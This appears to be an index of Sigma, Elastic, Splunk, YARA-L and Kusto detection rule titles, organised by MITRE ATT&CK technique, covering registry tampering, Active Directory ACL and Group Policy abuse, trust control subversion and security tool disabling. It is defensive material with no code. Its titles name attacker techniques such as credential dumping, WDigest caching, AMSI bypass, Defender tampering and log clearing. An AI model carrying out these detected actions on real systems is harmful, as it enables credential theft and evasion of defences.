- Sigma ETW Logging Disabled For rpcrt4.dll test
- Sigma ETW Logging Disabled For SCM test
- Sigma ETW Logging Disabled In .NET Processes - Registry test
- Sigma ETW Logging Disabled In .NET Processes - Sysmon Registry test
- Elastic File or Directory Deletion Command production
- Sigma FlowCloud Registry Markers test
- Splunk FodHelper UAC Bypass production
- Elastic Full User-Mode Dumps Enabled System-Wide production
- Splunk HTTP_HTTPS Default Security Zone Modified to Local Machine (PowerShell)
- Splunk HTTP_HTTPS Default Security Zone Modified to Local Machine (Windows Event Log)
- Elastic Image File Execution Options Injection production
- Sigma Impacket SMBexec service creation (registry) experimental
- Sigma Impacket SMBexec service registration (native) experimental
- Sigma Imports Registry Key From a File test
- Sigma Imports Registry Key From an ADS test
- Elastic Installation of Security Support Provider production
- Elastic Local Account TokenFilter Policy Disabled production
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (PowerShell)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Sysmon)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Windows Event Log)
- Sigma Macro Enabled In A Potentially Suspicious Document test
- Splunk Malicious InProcServer32 Modification production
- Sigma Microsoft Office Trusted Location Updated test
- Elastic Microsoft Windows Defender Tampering production
- Elastic Modification of AmsiEnable Registry Key production
- Sigma Modification of IE Registry Settings test
- Elastic Modification of WDigest Security Provider production
- Splunk Modify Registry Key (Windows Event Log)
- Elastic MS Office Macro Security Registry Modifications production
- Sigma NET NGenAssemblyUsageLog Registry Key Tamper test
- Sigma NetNTLM Downgrade Attack test
- Sigma NetNTLM Downgrade Attack - Registry test
- Elastic Netsh Helper DLL production
- Elastic Network-Level Authentication (NLA) Disabled production
- Sigma New BgInfo.EXE Custom DB Path Registry Configuration test
- Sigma New BgInfo.EXE Custom VBScript Registry Configuration test
- Sigma New BgInfo.EXE Custom WMI Query Registry Configuration test
- Sigma New DNS ServerLevelPluginDll Installed test
- Sigma New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE test
- Sigma Non-privileged Usage of Reg or Powershell test
- Elastic NullSessionPipe Registry Modification production
- Sigma OceanLotus Registry Activity test
- Sigma Office Macros Warning Disabled test
- Elastic Office Test Registry Persistence production
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Outlook EnableUnsafeClientMailRules Setting Enabled - Registry test
- Elastic Outlook Home Page Registry Modification production
- Elastic Persistence via Hidden Run Key Detected production
- Elastic Port Forwarding Rule Addition production
- Splunk Possible Credential Dumping via Windows Network Providers (PowerShell)
- Splunk Possible Credential Dumping via Windows Network Providers (Windows Event Log)
- Elastic Potential NetNTLMv1 Downgrade Attack production
- Sigma Potential NetWire RAT Activity - Registry test
- Sigma Potential Persistence Via Custom Protocol Handler test
- Sigma Potential Persistence Via Event Viewer Events.asp test
- Elastic Potential Persistence via Mandatory User Profile production
- Sigma Potential Persistence Via Outlook Home Page test
- Sigma Potential Persistence Via Outlook Today Page test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma Potential Qakbot Registry Activity test
- Sigma Potential Raspberry Robin Registry Set Internet Settings ZoneMap test
- Elastic Potential RemoteMonologue Attack production
- Sigma Potential Suspicious Registry File Imported Via Reg.EXE test
- Sigma Potential Tampering With RDP Related Registry Keys Via Reg.EXE test
- YARA-L Potential Tampering With RDP Related Registry Keys Via Reg.EXE
- Sigma Potential Ursnif Malware Activity - Registry test
- Sigma Potentially Suspicious Desktop Background Change Using Reg.EXE test
- Sigma Potentially Suspicious Desktop Background Change Via Registry test
- Sigma PowerShell Logging Disabled Via Registry Key Tampering test
- Splunk PowerShell Modifying Registry Values (PowerShell)
- Splunk PowerShell Modifying Registry Values (Sysmon)
- Splunk PowerShell Modifying Registry Values (Windows Event Log)
- Elastic PowerShell Script Block Logging Disabled production
- Elastic Privilege Escalation via Windir Environment Variable production
- Splunk RDP Enabled (PowerShell)
- Splunk RDP Enabled (Sysmon)
- Splunk RDP Enabled (Windows Event Log)
- Elastic RDP Enabled via Registry production
- Sigma RDP Sensitive Settings Changed test
- YARA-L RDP Sensitive Settings Changed
- Sigma RDP Sensitive Settings Changed to Zero test
- YARA-L RDP Sensitive Settings Changed to Zero
- Sigma RedMimicry Winnti Playbook Registry Manipulation test
- Sigma Reg Add Suspicious Paths test
- Splunk Reg.exe Process Execution (Sysmon)
- Splunk Reg.exe Process Execution (Windows Event Log)
- Splunk Regini.exe Execution (Sysmon)
- Splunk Regini.exe Execution (Windows Event Log)
- Sigma Registry Entries For Azorult Malware test
- Splunk Registry Entry Created - PowerShell (PowerShell)
- Sigma Registry Explorer Policy Modification test
- Sigma Registry Hide Function from User test
- Splunk Registry key added with reg.exe (Sysmon)
- Splunk Registry key added with reg.exe (Windows Event Log)
- Sigma Registry Manipulation via WMI Stdregprov experimental
- Sigma Registry Modification Attempt Via VBScript experimental
- Sigma Registry Modification Attempt Via VBScript - PowerShell experimental
- Sigma Registry Modification for OCI DLL Redirection experimental
- Sigma Registry Modification of MS-settings Protocol Handler test
- Sigma Registry Modification Via Regini.EXE test
- Elastic Registry Persistence via AppInit DLL production
- Sigma Registry Tampering by Potentially Suspicious Processes experimental
- Splunk Remcos client registry install entry production
- Sigma Removal of Potential COM Hijacking Registry Keys test
- Sigma RestrictedAdminMode Registry Value Tampering test
- YARA-L RestrictedAdminMode Registry Value Tampering
- Sigma RestrictedAdminMode Registry Value Tampering - ProcCreation test
- Splunk Revil Registry Entry production
- Sigma Run Once Task Configuration in Registry test
- Sigma Run Once Task Execution as Configured in Registry test
- Splunk Rundll32 Shimcache Flush production
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Process experimental
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Registry Set experimental
- Sigma Service Binary in Suspicious Folder test
- Sigma Service Binary in User Controlled Folder test
- Elastic Service Disabled via Registry Modification production
- Elastic Service Path Modification production
- Sigma ShimCache Flush stable
- YARA-L ShimCache Flush
- Elastic SolarWinds Process Disabling Services via Registry production
- Elastic Startup or Run Key Registry Modification production
- Elastic Suspicious ImagePath Service Creation production
- Elastic Suspicious Print Spooler Point and Print DLL production
- Splunk Suspicious Reg exe Process production
- Sigma Suspicious Registry Modification From ADS Via Regini.EXE test
- Elastic Suspicious Startup Shell Folder Modification production
- Sigma Suspicious VBoxDrvInst.exe Parameters test
- Sigma Sysmon Channel Reference Deletion test
- Sigma Terminal Server Client Connection History Cleared - Registry test
- Sigma Trust Access Disable For VBApplications test
- Sigma Uncommon Microsoft Office Trusted Location Added test
- Elastic Uncommon Registry Persistence Change production
- Elastic Unusual Persistence via Services Registry production
- Sigma User Shell Folders Registry Modification via CommandLine experimental
- Sigma Wdigest CredGuard Registry Modification test
- Sigma Wdigest Enable UseLogonCredential test
- YARA-L Wdigest Enable UseLogonCredential
- Splunk WDigest Forced Credential Caching (PowerShell)
- Splunk WDigest Forced Credential Caching (Sysmon)
- Splunk WDigest Forced Credential Caching (Windows Event Log)
- Elastic Werfault ReflectDebugger Persistence production
- Splunk Windows Anomalous Registry Value Length in Environment Key production
- Splunk Windows Defender ASR Registry Modification production
- Splunk Windows Defender ASR Rule Disabled production
- Elastic Windows Defender Disabled via Registry Modification production
- Splunk Windows Deleted Registry By A Non Critical Process File Path production
- Splunk Windows Disable Change Password Through Registry production
- Splunk Windows Disable Lock Workstation Feature Through Registry production
- Splunk Windows Disable LogOff Button Through Registry production
- Splunk Windows Disable Notification Center production
- Splunk Windows Disable Shutdown Button Through Registry production
- Splunk Windows Disable Windows Group Policy Features Through Registry production
- Splunk Windows Downdate Registry Activity production
- Sigma Windows Event Log Access Tampering Via Registry experimental
- Splunk Windows Hide Notification Features Through Registry production
- Splunk Windows Impair Defenses Disable AV AutoStart via Registry production
- Splunk Windows InProcServer32 New Outlook Form production
- Splunk Windows Modify Registry AuthenticationLevelOverride production
- Splunk Windows Modify Registry Auto Minor Updates production
- Splunk Windows Modify Registry Auto Update Notif production
- Splunk Windows Modify Registry Configure BitLocker production
- Splunk Windows Modify Registry Default Icon Setting production
- Splunk Windows Modify Registry Delete Firewall Rules production
- Splunk Windows Modify Registry Disable RDP production
- Splunk Windows Modify Registry Disable Restricted Admin production
- Splunk Windows Modify Registry Disable Toast Notifications production
- Splunk Windows Modify Registry Disable Win Defender Raw Write Notif production
- Splunk Windows Modify Registry Disable WinDefender Notifications production
- Splunk Windows Modify Registry Disable Windows Security Center Notif production
- Splunk Windows Modify Registry DisableRemoteDesktopAntiAlias production
- Splunk Windows Modify Registry DisableSecuritySettings production
- Splunk Windows Modify Registry Disabling WER Settings production
- Splunk Windows Modify Registry DisAllow Windows App production
- Splunk Windows Modify Registry Do Not Connect To Win Update production
- Splunk Windows Modify Registry DontShowUI production
- Splunk Windows Modify Registry EnableLinkedConnections production
- Splunk Windows Modify Registry LongPathsEnabled production
- Splunk Windows Modify Registry MaxConnectionPerServer production
- Splunk Windows Modify Registry No Auto Reboot With Logon User production
- Splunk Windows Modify Registry No Auto Update production
- Splunk Windows Modify Registry NoChangingWallPaper production
- Splunk Windows Modify Registry on Smart Card Group Policy production
- Splunk Windows Modify Registry ProxyEnable production
- Splunk Windows Modify Registry ProxyServer production
- Splunk Windows Modify Registry Qakbot Binary Data Registry production
- Splunk Windows Modify Registry Regedit Silent Reg Import production
- Splunk Windows Modify Registry Suppress Win Defender Notif production
- Splunk Windows Modify Registry Tamper Protection production
- Splunk Windows Modify Registry to Add or Modify Firewall Rule production
- Splunk Windows Modify Registry UpdateServiceUrlAlternate production
- Splunk Windows Modify Registry USeWuServer production
- Splunk Windows Modify Registry Utilize ProgIDs production
- Splunk Windows Modify Registry ValleyRAT C2 Config production
- Splunk Windows Modify Registry ValleyRat PWN Reg Entry production
- Splunk Windows Modify Registry With MD5 Reg Key Name production
- Splunk Windows Modify Registry WuServer production
- Splunk Windows Modify Registry wuStatusServer production
- Splunk Windows Modify Show Compress Color And Info Tip Registry production
- Splunk Windows New InProcServer32 Added production
- Splunk Windows Outlook Dialogs Disabled from Unusual Process production
- Splunk Windows Outlook LoadMacroProviderOnBoot Persistence production
- Splunk Windows Outlook WebView Registry Modification production
- Splunk Windows Routing and Remote Access Service Registry Key Change production
- Splunk Windows RunMRU Registry Key or Value Deleted production
- Splunk Windows Set Network Profile Category to Private via Registry production
- Splunk Windows Snake Malware Registry Modification wav OpenWithProgIds production
- Splunk Windows SnappyBee Create Test Registry production
- Elastic Windows Subsystem for Linux Distribution Installed production
- Sigma Winlogon AllowMultipleTSSessions Enable test
Rogue Domain Controller T1207 7 rules
- Sigma Account accessed to attributes related to DCshadow experimental
- Sigma Add or Remove Computer from DC test
- Sigma Possible DC Shadow Attack test
- Splunk Windows AD DCShadow Privileges ACL Addition production
- Splunk Windows AD Domain Controller Promotion production
- Splunk Windows AD Short Lived Domain Controller SPN Attribute production
- Splunk Windows AD Short Lived Server Object production
File and Directory Permissions Modification T1222 50 rules
- Sigma AD Object WriteDAC Access test
- Elastic Adding Hidden File Attribute via Attrib production
- Sigma Computer account modifying Active Directory permissions experimental
- Sigma Computer account modifying Active Directory permissions (PrivExchange) experimental
- Splunk Excessive Usage Of Cacls App production
- Elastic File and Directory Permissions Modification production
- Sigma File or Folder Permissions Modifications test
- Splunk File_Folder Hidden - Windows (PowerShell)
- Splunk File_Folder Hidden - Windows (Sysmon)
- Splunk File_Folder Hidden - Windows (Windows Event Log)
- Splunk Full Control Permissions Granted to Everyone - Windows (Sysmon)
- Splunk Full Control Permissions Granted to Everyone - Windows (Windows Event Log)
- Splunk Hiding Files And Directories With Attrib exe production
- Splunk Icacls Deny Command production
- Splunk ICACLS Grant Command production
- Splunk Modify ACL permission To Files Or Folder production
- Sigma OCSP responder security settings changed experimental
- Splunk Permission Modification using Takeown App production
- Splunk Permissions Replaced by icacls - Windows (PowerShell)
- Splunk Permissions Replaced by icacls - Windows (Sysmon)
- Splunk Permissions Replaced by icacls - Windows (Windows Event Log)
- Sigma Potentially Suspicious NTFS Symlink Behavior Modification test
- Sigma PowerShell Script Change Permission Via Set-Acl - PsScript test
- Sigma PowerShell Set-Acl On Windows Folder - PsScript test
- Splunk Read-Only Attribute Removed - Windows (PowerShell)
- Splunk Read-Only Attribute Removed - Windows (Sysmon)
- Splunk Read-Only Attribute Removed - Windows (Windows Event Log)
- Sigma Replication privileges granted to perform DCSync attack experimental
- Sigma Suspicious permissions modification on a network share experimental
- Sigma Suspicious Recursive Takeown test
- Elastic System File Ownership Change production
- Sigma WannaCry Ransomware Activity test
- Splunk Windows AD Dangerous Deny ACL Modification production
- Splunk Windows AD Dangerous Group ACL Modification production
- Splunk Windows AD Dangerous User ACL Modification production
- Splunk Windows AD DCShadow Privileges ACL Addition production
- Splunk Windows AD Domain Root ACL Deletion production
- Splunk Windows AD Domain Root ACL Modification production
- Splunk Windows AD GPO New CSE Addition production
- Splunk Windows AD Hidden OU Creation production
- Splunk Windows AD Object Owner Updated production
- Splunk Windows AD Suspicious Attribute Modification production
- Splunk Windows File and Directory Enable ReadOnly Permissions production
- Splunk Windows File and Directory Permissions Enable Inheritance production
- Splunk Windows File and Directory Permissions Remove Inheritance production
- Splunk Windows Files and Dirs Access Rights Modification Via Icacls production
- Splunk Windows SubInAcl Execution production
- Splunk Windows SymbolicLink-Testing-Tools Utility Execution production
- Splunk Windows Symlink Evaluation Change via Fsutil production
- Elastic WRITEDAC Access on Active Directory Object production
File and Directory Permissions Modification: Windows Permissions T1222.001 41 rules
- Sigma AD Object WriteDAC Access test
- Elastic Adding Hidden File Attribute via Attrib production
- Sigma Computer account modifying Active Directory permissions experimental
- Sigma Computer account modifying Active Directory permissions (PrivExchange) experimental
- Elastic File and Directory Permissions Modification production
- Sigma File or Folder Permissions Modifications test
- Splunk File_Folder Hidden - Windows (PowerShell)
- Splunk File_Folder Hidden - Windows (Sysmon)
- Splunk File_Folder Hidden - Windows (Windows Event Log)
- Splunk Full Control Permissions Granted to Everyone - Windows (Sysmon)
- Splunk Full Control Permissions Granted to Everyone - Windows (Windows Event Log)
- Splunk Hiding Files And Directories With Attrib exe production
- Splunk Permissions Replaced by icacls - Windows (PowerShell)
- Splunk Permissions Replaced by icacls - Windows (Sysmon)
- Splunk Permissions Replaced by icacls - Windows (Windows Event Log)
- Sigma Potentially Suspicious NTFS Symlink Behavior Modification test
- Splunk Read-Only Attribute Removed - Windows (PowerShell)
- Splunk Read-Only Attribute Removed - Windows (Sysmon)
- Splunk Read-Only Attribute Removed - Windows (Windows Event Log)
- Sigma Replication privileges granted to perform DCSync attack experimental
- Sigma Suspicious permissions modification on a network share experimental
- Sigma Suspicious Recursive Takeown test
- Elastic System File Ownership Change production
- Sigma WannaCry Ransomware Activity test
- Splunk Windows AD Dangerous Deny ACL Modification production
- Splunk Windows AD Dangerous Group ACL Modification production
- Splunk Windows AD Dangerous User ACL Modification production
- Splunk Windows AD DCShadow Privileges ACL Addition production
- Splunk Windows AD Domain Root ACL Deletion production
- Splunk Windows AD Domain Root ACL Modification production
- Splunk Windows AD GPO New CSE Addition production
- Splunk Windows AD Hidden OU Creation production
- Splunk Windows AD Object Owner Updated production
- Splunk Windows AD Suspicious Attribute Modification production
- Splunk Windows File and Directory Enable ReadOnly Permissions production
- Splunk Windows File and Directory Permissions Enable Inheritance production
- Splunk Windows File and Directory Permissions Remove Inheritance production
- Splunk Windows Files and Dirs Access Rights Modification Via Icacls production
- Splunk Windows SubInAcl Execution production
- Splunk Windows Symlink Evaluation Change via Fsutil production
- Elastic WRITEDAC Access on Active Directory Object production
Domain or Tenant Policy Modification T1484 33 rules
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Group Policy Abuse for Privilege Addition test
- Elastic Group Policy Abuse for Privilege Addition production
- Splunk Modify Group Policy (Windows Event Log)
- Sigma Modify Group Policy Settings test
- Sigma Modify Group Policy Settings - ScriptBlockLogging test
- Sigma Permissions changed on a Group Policy (GPO) experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Scheduled Task Execution at Scale via GPO production
- Kusto Shadow Credentials Added to Account
- Kusto Shadow Credentials Added to Account (Alternative)
- Sigma Startup/Logon Script Added to Group Policy Object test
- Elastic Startup/Logon Script added to Group Policy Object production
- Sigma Suspicious modification of a sensitive Group Policy (GPO) experimental
- Splunk Windows AD Dangerous Deny ACL Modification production
- Splunk Windows AD Dangerous Group ACL Modification production
- Splunk Windows AD Dangerous User ACL Modification production
- Splunk Windows AD DCShadow Privileges ACL Addition production
- Splunk Windows AD Domain Replication ACL Addition production
- Splunk Windows AD Domain Root ACL Deletion production
- Splunk Windows AD Domain Root ACL Modification production
- Splunk Windows AD GPO Deleted production
- Splunk Windows AD GPO Disabled production
- Splunk Windows AD GPO New CSE Addition production
- Splunk Windows AD Hidden OU Creation production
- Splunk Windows AD Object Owner Updated production
- Splunk Windows AD Self DACL Assignment production
- Sigma Windows Default Domain GPO Modification experimental
- Sigma Windows Default Domain GPO Modification via GPME experimental
- Splunk Windows Default Group Policy Object Modified production
- Splunk Windows Default Group Policy Object Modified with GPME production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
Domain or Tenant Policy Modification: Group Policy Modification T1484.001 20 rules
- Sigma Group Policy Abuse for Privilege Addition test
- Elastic Group Policy Abuse for Privilege Addition production
- Splunk Modify Group Policy (Windows Event Log)
- Sigma Modify Group Policy Settings test
- Sigma Modify Group Policy Settings - ScriptBlockLogging test
- Sigma Permissions changed on a Group Policy (GPO) experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Scheduled Task Execution at Scale via GPO production
- Sigma Startup/Logon Script Added to Group Policy Object test
- Elastic Startup/Logon Script added to Group Policy Object production
- Sigma Suspicious modification of a sensitive Group Policy (GPO) experimental
- Splunk Windows AD GPO Deleted production
- Splunk Windows AD GPO Disabled production
- Splunk Windows AD GPO New CSE Addition production
- Sigma Windows Default Domain GPO Modification experimental
- Sigma Windows Default Domain GPO Modification via GPME experimental
- Splunk Windows Default Group Policy Object Modified production
- Splunk Windows Default Group Policy Object Modified with GPME production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
Subvert Trust Controls T1553 38 rules
- Sigma Active Directory Certificate Services Denied Certificate Enrollment Request test
- Splunk Certutil Root Certificate Install (Windows Event Log)
- Sigma Certutil root certificate installation experimental
- Elastic Code Signing Policy Modification Through Built-in tools production
- Elastic Code Signing Policy Modification Through Registry production
- Elastic Creation or Modification of Root Certificate production
- Elastic Expired or Revoked Driver Loaded production
- Splunk ISO Image Mounted - Windows (PowerShell)
- Splunk ISO Image Mounted - Windows (Windows Event Log)
- Sigma Kapeka Backdoor Configuration Persistence test
- Sigma New Root Certificate Installed Via CertMgr.EXE test
- Sigma New Root Certificate Installed Via Certutil.EXE test
- Sigma Persistence Via New SIP Provider test
- Sigma Potential BOINC Software Execution (UC-Berkeley Signature) test
- Elastic Potential Masquerading as System32 Executable production
- Sigma Potential Secure Deletion with SDelete test
- Sigma Renamed BOINC Client Execution test
- Sigma Root Certificate Installed - PowerShell test
- Sigma Root Certificate Installed From Susp Locations test
- Elastic SIP Provider Modification production
- Sigma Suspicious Invoke-Item From Mount-DiskImage test
- Sigma Suspicious Mount-DiskImage test
- Sigma Suspicious RazerInstaller Explorer Subprocess test
- Sigma Suspicious SIP or trust provider registration experimental
- Sigma Suspicious Unblock-File test
- Sigma Suspicious X509Enrollment - Process Creation test
- Sigma Suspicious X509Enrollment - Ps Script test
- Splunk Windows Advanced Installer MSIX with AI_STUBS Execution production
- Sigma Windows AppX Deployment Full Trust Package Installation experimental
- Splunk Windows AppX Deployment Full Trust Package Installation production
- Sigma Windows AppX Deployment Unsigned Package Installation experimental
- Splunk Windows AppX Deployment Unsigned Package Installation production
- Splunk Windows Developer-Signed MSIX Package Installation production
- Splunk Windows Mark Of The Web Bypass production
- Sigma Windows MSIX Package Support Framework AI_STUBS Execution experimental
- Splunk Windows Registry Certificate Added production
- Splunk Windows Registry SIP Provider Modification production
- Splunk Windows SIP WinVerifyTrust Failed Trust Validation production
Subvert Trust Controls: Code Signing T1553.002 3 rules
- Elastic Expired or Revoked Driver Loaded production
- Elastic Potential Masquerading as System32 Executable production
- Sigma Potential Secure Deletion with SDelete test
Subvert Trust Controls: SIP and Trust Provider Hijacking T1553.003 6 rules
- Sigma Kapeka Backdoor Configuration Persistence test
- Sigma Persistence Via New SIP Provider test
- Elastic SIP Provider Modification production
- Sigma Suspicious SIP or trust provider registration experimental
- Splunk Windows Registry SIP Provider Modification production
- Splunk Windows SIP WinVerifyTrust Failed Trust Validation production
Subvert Trust Controls: Install Root Certificate T1553.004 11 rules
- Sigma Active Directory Certificate Services Denied Certificate Enrollment Request test
- Splunk Certutil Root Certificate Install (Windows Event Log)
- Sigma Certutil root certificate installation experimental
- Elastic Creation or Modification of Root Certificate production
- Sigma New Root Certificate Installed Via CertMgr.EXE test
- Sigma New Root Certificate Installed Via Certutil.EXE test
- Sigma Root Certificate Installed - PowerShell test
- Sigma Root Certificate Installed From Susp Locations test
- Sigma Suspicious X509Enrollment - Process Creation test
- Sigma Suspicious X509Enrollment - Ps Script test
- Splunk Windows Registry Certificate Added production
Subvert Trust Controls: Mark-of-the-Web Bypass T1553.005 13 rules
- Splunk ISO Image Mounted - Windows (PowerShell)
- Splunk ISO Image Mounted - Windows (Windows Event Log)
- Sigma Suspicious Invoke-Item From Mount-DiskImage test
- Sigma Suspicious Mount-DiskImage test
- Sigma Suspicious Unblock-File test
- Splunk Windows Advanced Installer MSIX with AI_STUBS Execution production
- Sigma Windows AppX Deployment Full Trust Package Installation experimental
- Splunk Windows AppX Deployment Full Trust Package Installation production
- Sigma Windows AppX Deployment Unsigned Package Installation experimental
- Splunk Windows AppX Deployment Unsigned Package Installation production
- Splunk Windows Developer-Signed MSIX Package Installation production
- Splunk Windows Mark Of The Web Bypass production
- Sigma Windows MSIX Package Support Framework AI_STUBS Execution experimental
Subvert Trust Controls: Code Signing Policy Modification T1553.006 2 rules
- Elastic Code Signing Policy Modification Through Built-in tools production
- Elastic Code Signing Policy Modification Through Registry production
Modify Authentication Process T1556 14 rules
- Sigma Directory Service Restore Mode(DSRM) Registry Value Tampering test
- Splunk Disabling Windows Local Security Authority Defences via Registry production
- Sigma Dropping Of Password Filter DLL test
- Elastic Network Logon Provider Registry Modification production
- Sigma Possible Shadow Credentials Added test
- Splunk Potential LSA password filter (PowerShell)
- Splunk Potential LSA password filter (Windows Event Log)
- Elastic Potential Shadow Credentials added to AD Object production
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Powershell Install a DLL in System Directory test
- Kusto Rouge RDP: Suspicious File Creation
- Splunk Suspicious Certificate Authentication (Windows Event Log)
- Splunk Suspicious Certificate Modification (Windows Event Log)
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
Modify Authentication Process: Hybrid Identity T1556.007 1 rule
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
Modify Authentication Process: Network Provider DLL T1556.008 1 rule
- Elastic Network Logon Provider Registry Modification production
Network Boundary Bridging T1599 1 rule
- Sigma WinDivert Driver Load test
Network Boundary Bridging: Network Address Translation Traversal T1599.001 1 rule
- Sigma WinDivert Driver Load test
Disable or Modify Tools T1685 274 rules
- Splunk Add or Set Windows Defender Exclusion production
- Sigma Add SafeBoot Keys Via Reg Utility test
- Sigma AMSI Bypass Pattern Assembly GetType test
- Sigma AMSI Disabled via Registry Modification experimental
- Sigma Antivirus Filter Driver Disallowed On Dev Drive - Registry test
- Sigma Audit Policy Tampering Via Auditpol test
- Sigma Audit Policy Tampering Via NT Resource Kit Auditpol test
- Sigma Change Winevt Channel Access Permission Via Registry test
- Sigma Devcon Execution Disabling VMware VMCI Device experimental
- Sigma Diamond Sleet APT Scheduled Task Creation - Registry test
- Splunk Disable AMSI Through Registry production
- Splunk Disable Defender AntiVirus Registry production
- Splunk Disable Defender BlockAtFirstSeen Feature production
- Splunk Disable Defender Enhanced Notification production
- Splunk Disable Defender MpEngine Registry production
- Splunk Disable Defender Spynet Reporting production
- Splunk Disable Defender Submit Samples Consent Feature production
- Splunk Disable ETW Through Registry production
- Sigma Disable Exploit Guard Network Protection on Windows Defender test
- Splunk Disable Logs Using WevtUtil production
- Sigma Disable of ETW Trace - Powershell test
- Sigma Disable Privacy Settings Experience in Registry test
- Sigma Disable PUA Protection on Windows Defender test
- Splunk Disable Registry Tool production
- Splunk Disable Schedule Task production
- Sigma Disable Security Events Logging Adding Reg Key MiniNt test
- Splunk Disable Show Hidden Files production
- Sigma Disable Tamper Protection on Windows Defender test
- Splunk Disable Windows App Hotkeys production
- Splunk Disable Windows Behavior Monitoring production
- Sigma Disable Windows Defender AV Security Monitoring test
- Sigma Disable Windows Defender Functionalities Via Registry Keys test
- Sigma Disable Windows Event Logging Via Registry test
- Sigma Disable Windows IIS HTTP Logging test
- Splunk Disable Windows SmartScreen Protection production
- Sigma Disable-WindowsOptionalFeature Command PowerShell test
- Sigma Disabled IE Security Features test
- Sigma Disabled Volume Snapshots test
- Sigma Disabled Windows Defender Eventlog test
- Splunk Disabling CMD Application production
- Splunk Disabling ControlPanel production
- Splunk Disabling Defender Services production
- Splunk Disabling Firewall with Netsh production
- Splunk Disabling FolderOptions Windows Feature production
- Splunk Disabling NoRun Windows App production
- Splunk Disabling Task Manager production
- Sigma Disabling Windows Defender WMI Autologger Session via Reg.exe experimental
- Sigma Dism Remove Online Package test
- Sigma Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback test
- Sigma ETW Logging Disabled For rpcrt4.dll test
- Sigma ETW Logging Disabled For SCM test
- Sigma ETW Logging Disabled In .NET Processes - Registry test
- Sigma ETW Logging Disabled In .NET Processes - Sysmon Registry test
- Sigma ETW Logging Tamper In .NET Processes Via CommandLine test
- Sigma ETW Logging/Processing Option Disabled On IIS Server test
- Splunk ETW Registry Disabled production
- Sigma ETW Trace Evasion Activity test
- Sigma Eventlog Cleared test
- Sigma EVTX Created In Uncommon Location test
- Splunk Excessive number of service control start as disabled production
- Splunk Excessive Usage Of Taskkill production
- Sigma Filter Driver Unloaded Via Fltmc.EXE test
- Sigma Folder Removed From Exploit Guard ProtectedFolders List - Registry test
- Sigma Forest Blizzard APT - File Creation Activity test
- Sigma Forest Blizzard APT - JavaScript Constrained File Creation test
- Sigma HackTool - CobaltStrike BOF Injection Pattern test
- Sigma Hacktool - EDR-Freeze Execution experimental
- Sigma HackTool - EDRSilencer Execution test
- Sigma HackTool - EDRSilencer Execution - Filter Added test
- Sigma HackTool - PowerTool Execution test
- Sigma HackTool - SharpEvtMute DLL Load test
- Sigma HackTool - SharpEvtMute Execution test
- Sigma HackTool - Stracciatella Execution test
- Sigma HackTool - SysmonEnte Execution test
- Sigma Hide Schedule Task Via Index Value Tamper test
- Splunk Hide User Account From Sign-In Screen production
- Sigma HTTP Logging Disabled On IIS Server test
- Sigma Hypervisor Enforced Paging Translation Disabled test
- Sigma Hypervisor-protected Code Integrity (HVCI) Related Registry Tampering Via CommandLine experimental
- Sigma Important Windows Event Auditing Disabled test
- Sigma Important Windows Eventlog Cleared test
- Sigma Load Of RstrtMgr.DLL By A Suspicious Process test
- Sigma Load Of RstrtMgr.DLL By An Uncommon Process test
- Sigma Microsoft Defender Tamper Protection Trigger stable
- Sigma Microsoft Malware Protection Engine Crash test
- Sigma Microsoft Malware Protection Engine Crash - WER test
- Sigma Microsoft Office Protected View Disabled test
- Sigma NetNTLM Downgrade Attack test
- Sigma NetNTLM Downgrade Attack - Registry test
- Sigma New Module Module Added To IIS Server test
- Sigma NotPetya Ransomware Activity test
- Sigma Obfuscated PowerShell OneLiner Execution test
- Sigma Potential AMSI Bypass Script Using NULL Bits test
- Sigma Potential AMSI Bypass Using NULL Bits test
- Sigma Potential AMSI Bypass Via .NET Reflection test
- Sigma Potential AMSI COM Server Hijacking test
- Sigma Potential AutoLogger Sessions Tampering test
- Sigma Potential EventLog File Location Tampering test
- Sigma Potential Ke3chang/TidePool Malware Activity test
- Sigma Potential Privileged System Service Operation - SeLoadDriverPrivilege test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Potential Tampering With Security Products Via WMIC test
- Sigma Potential Windows Defender Tampering Via Wmic.EXE test
- Sigma Powershell Base64 Encoded MpPreference Cmdlet test
- Sigma Powershell Defender Disable Scan Feature test
- Sigma Powershell Defender Exclusion test
- Sigma PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction' experimental
- Splunk Powershell Disable Security Monitoring production
- Splunk Powershell Remove Windows Defender Directory production
- Splunk Powershell Windows Defender Exclusion Commands production
- Sigma PPL Tampering Via WerFaultSecure experimental
- Sigma Previously Installed IIS Module Was Removed test
- Splunk Process Kill Base On File Path production
- Sigma PUA - CleanWipe Execution test
- Sigma Python Function Execution Security Warning Disabled In Excel test
- Sigma Python Function Execution Security Warning Disabled In Excel - Registry test
- Sigma Raccine Uninstall test
- Sigma RedSun - Named Pipe Created experimental
- Sigma RedSun - TieringEngineService.exe Detected as EICAR Test File experimental
- Sigma Reg Add Suspicious Paths test
- Sigma Removal Of AMSI Provider Registry Keys test
- Sigma Removal Of Index Value to Hide Schedule Task - Registry test
- Sigma Removal Of SD Value to Hide Schedule Task - Registry test
- Sigma SafeBoot Registry Key Deleted Via Reg.EXE test
- Sigma Scripted Diagnostics Turn Off Check Enabled - Registry test
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Process experimental
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Registry Set experimental
- Sigma Security Eventlog Cleared test
- Sigma Security Service Disabled Via Reg.EXE test
